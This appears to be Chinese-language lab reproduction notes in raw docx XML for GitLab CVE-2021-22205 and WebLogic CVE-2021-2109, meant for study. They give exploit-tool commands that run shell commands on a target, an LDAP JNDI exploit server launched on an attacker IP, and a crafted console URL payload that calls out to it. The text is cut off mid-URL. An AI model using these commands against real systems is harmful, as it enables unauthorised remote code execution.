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734FD" w14:textId="642526AF" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785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E84785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CVE-2021-22205 GitLab 远程命令执行漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758259CC" w14:textId="2091E36F" w:rsidR="00E84785" w:rsidRPr="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00E84785">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>一、漏洞信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BBE704" w14:textId="77777777" w:rsidR="00E84785" w:rsidRPr="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00E84785">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>漏洞名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785"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  <w:tab/>
        <w:t>GITLAB 远程命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A3A53" w14:textId="77777777" w:rsidR="00E84785" w:rsidRPr="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00E84785">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>漏洞编号</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785"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  <w:tab/>
        <w:t>CVE-2021-22205</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A97A5CF" w14:textId="77777777" w:rsidR="00E84785" w:rsidRPr="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00E84785">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>受影响版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785"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  <w:tab/>
        <w:t>11.9 &lt;= Gitlab CE/EE &lt; 13.8.8；13.9 &lt;= Gitlab CE/EE &lt; 13.9.6；13.10 &lt;= Gitlab CE/EE &lt; 13.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE5F3C" w14:textId="22822006" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00E84785"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  <w:t>GitLab</w:t>
      </w:r>
      <w:r w:rsidR="00EE6ECA"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  <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785"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  <w:t>一款Ruby开发的Git项目管理平台。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74937AA2" w14:textId="58D48319" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB645CC" w14:textId="11E1AC17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搭建靶场并访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19939CE3" w14:textId="04CD6031" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785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3B08E7CC" wp14:editId="395B7612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EE7F" w14:textId="709D6EE7" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B47BEB" w14:textId="4102C4B5" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22412188" w14:textId="0BFA0CE9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使用漏洞利用工具:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00862A16">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/Al1ex/CVE-2021-22205</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4629BEB9" w14:textId="4369CC72" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD50230" w14:textId="55BD7ABE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使用该工具验证靶场是否存在漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A9B6B" w14:textId="0D40AA6C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命令:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>py -3 CVE-2021-22205.py -v true -t http://172.16.105.192:56910</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E29C8" w14:textId="04D69A39" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7725CD51" wp14:editId="7D057745">
            <wp:extent cx="5274310" cy="1805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3DE5" w14:textId="3D3E5514" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B52C6C5" w14:textId="2F50EE0E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使用工具利用漏洞向目标主机写入文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9560B" w14:textId="1D33644C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命令:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E84785">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>py -3 CVE-2021-22205.py -a true -t http://172.16.105.192:56910 -c "echo 'Attacked by xiaohe!!!' &gt; /tmp/1.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C65233" w14:textId="37990EFB" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785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4175190F" wp14:editId="36E984D1">
            <wp:extent cx="5274310" cy="17100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0D9" w14:textId="4A3D7C73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进入靶场查看文件是否写入成功:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC20F1" w14:textId="2634E5A1" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785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48205E8C" wp14:editId="1CD80497">
            <wp:extent cx="3635055" cy="96020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3FC" w14:textId="5B2353DC" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75550C8A" w14:textId="0F14C819" w:rsidR="00E84785" w:rsidRDefault="00E84785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文件写入成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4D153D" w14:textId="47349ACE" w:rsidR="00E84785" w:rsidRDefault="00E84785" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48239BEA" w14:textId="2E0429A0" w:rsidR="00E84785" w:rsidRPr="009D3B5F" w:rsidRDefault="009D3B5F" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="25"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D3B5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E464B7" w14:textId="00B03EA7" w:rsidR="00132978" w:rsidRDefault="009D3B5F" w:rsidP="00E84785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升级至安全版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046046BE" w14:textId="7C8691BB" w:rsidR="009D3B5F" w:rsidRDefault="009D3B5F" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5191ACCD" w14:textId="77777777" w:rsidR="009D3B5F" w:rsidRDefault="009D3B5F" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228FE7DB" w14:textId="0151DA2F" w:rsidR="00132978" w:rsidRDefault="00132978" w:rsidP="00132978">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round"/>
          <w:color w:val="2C2C2C"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132978">
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="2C2C2C"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CVE-2021-2109_Weblogic Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00132978">
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="2C2C2C"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E233D0D" w14:textId="0A2F2026" w:rsidR="00132978" w:rsidRDefault="00132978" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76703C78" w14:textId="5CB91C1A" w:rsidR="005C10A5" w:rsidRDefault="008A020E" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24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一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2D26D2" w14:textId="77777777" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A020E">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基</w:t>
      </w:r>
      <w:r w:rsidRPr="008A020E">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514355D" w14:textId="753711F7" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A020E">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入，导致攻击者可利用此漏洞远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25341D46" w14:textId="4477F686" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49394DCB" w14:textId="041239DC" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="00E84785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5"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7B647" w14:textId="77777777" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E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A020E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weblogic Server 10.3.6.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E187AE3" w14:textId="77777777" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E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A020E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weblogic Server 12.1.3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F400B" w14:textId="77777777" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E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A020E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weblogic Server 12.2.1.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB896D9" w14:textId="77777777" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E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A020E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weblogic Server 12.2.1.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537FED28" w14:textId="77777777" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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A020E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weblogic Server 14.1.1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF68CB" w14:textId="4A4255C2" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A107C0F" w14:textId="71043ECA" w:rsidR="008A020E" w:rsidRPr="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24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三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0CD17" w14:textId="45744043" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="008A020E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A020E">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JNDI是Java Naming and Directory Interface  （Java命名和目录接口）的英文简写， 是为Java应用程序提供命名和目录访问服务的API  （application programing interface，应用程序编 程接口）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37407D3F" w14:textId="4011A471" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDE529F" w14:textId="54875CEE" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A020E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开始复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804FE76" w14:textId="54D04B6D" w:rsidR="008A020E" w:rsidRDefault="008A020E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搭建靶场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA794D" w14:textId="254B4ADD" w:rsidR="008A020E" w:rsidRDefault="008A020E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CD1F355" wp14:editId="4B58B602">
            <wp:extent cx="5274310" cy="2933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57C" w14:textId="7AC44B12" w:rsidR="008A020E" w:rsidRDefault="008A020E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12650E6D" w14:textId="77777777" w:rsidR="00CA417B" w:rsidRDefault="00CA417B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直接访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA417B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/console/css/%252e%252e/consolejndi.portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CDBFFF" w14:textId="5C9F046B" w:rsidR="00CA417B" w:rsidRDefault="00CA417B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 w:rsidRPr="00CA417B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>如果此页面未授权可访问，且</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA417B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebLogic为受影响的版本，则可能存在漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E311435" w14:textId="198BFE2C" w:rsidR="00CA417B" w:rsidRDefault="00CA417B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10DEB1" wp14:editId="265B9E46">
            <wp:extent cx="5274310" cy="2070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29CC" w14:textId="77777777" w:rsidR="00CA417B" w:rsidRDefault="00CA417B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42F8A757" w14:textId="02E1A1D3" w:rsidR="008A020E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在攻击机上启动ldap脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00173742">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java -jar JNDIExploit-v1.11.jar -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I 192.168.1.40</w:t>
      </w:r>
      <w:r w:rsidRPr="00173742">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>攻击机</w:t>
      </w:r>
      <w:r w:rsidRPr="00173742">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C34E446" w14:textId="46269136" w:rsidR="00173742" w:rsidRPr="008A020E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09DA473" wp14:editId="4ABAB5D4">
            <wp:extent cx="4252328" cy="13793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24F2" w14:textId="77777777" w:rsidR="008A020E" w:rsidRDefault="008A020E" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E0B3E6" w14:textId="2C62516D" w:rsidR="005C10A5" w:rsidRDefault="005C10A5" w:rsidP="00E84785">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3CC69B" w14:textId="3E8EAF28" w:rsidR="00173742" w:rsidRPr="00173742" w:rsidRDefault="00173742" w:rsidP="00173742">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="916"/>
          <w:tab w:val="left" w:pos="1832"/>
          <w:tab w:val="left" w:pos="2748"/>
          <w:tab w:val="left" w:pos="345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Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00E164E5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://192.168.1.36:54092</w:t>
        </w:r>
        <w:r w:rsidRPr="00173742">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&amp;_nfpb=</w:t>
        </w:r>
        <w:r w:rsidRPr="00173742">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>true</w:t>
        </w:r>
        <w:r w:rsidRPr="00173742">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>&amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap:</w:t>
        </w:r>
        <w:r w:rsidRPr="00173742">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>//</w:t>
        </w:r>
        <w:r w:rsidRPr="00E164E5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
